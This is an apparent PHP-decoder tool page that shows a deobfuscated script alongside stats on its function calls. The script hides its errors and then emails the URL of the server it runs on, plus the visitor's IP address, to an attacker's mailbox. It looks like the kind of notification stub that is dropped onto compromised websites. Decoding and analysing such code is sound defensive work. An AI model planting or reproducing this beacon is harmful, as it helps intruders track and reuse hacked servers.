Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
@ini_set('output_buffering', 0); @ini_set('display_errors', 0);set_time_limit(0); ini_set(..
Decoded Output download
<? @ini_set('output_buffering', 0); @ini_set('display_errors', 0);set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type:text/html; charset=UTF-8'); $tujuanmail = '[email protected]'; $x_path= "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];$pesan_alert = "fix $x_path :p *IP Address : [ " .$_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail,"RaBiitch", $pesan_alert, "[ " .$_SERVER['REMOTE_ADDR'] . " ]"); ?>
Did this file decode correctly?
Original Code
@ini_set('output_buffering', 0); @ini_set('display_errors', 0);set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type:text/html; charset=UTF-8'); $tujuanmail = '[email protected]'; $x_path= "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];$pesan_alert = "fix $x_path :p *IP Address : [ " .$_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail,"RaBiitch", $pesan_alert, "[ " .$_SERVER['REMOTE_ADDR'] . " ]");
Function Calls
| header | 1 |
| ini_set | 3 |
| set_time_limit | 1 |
Stats
| MD5 | 081d53007687ec02e94e782c40ec1d57 |
| Eval Count | 0 |
| Decode Time | 99 ms |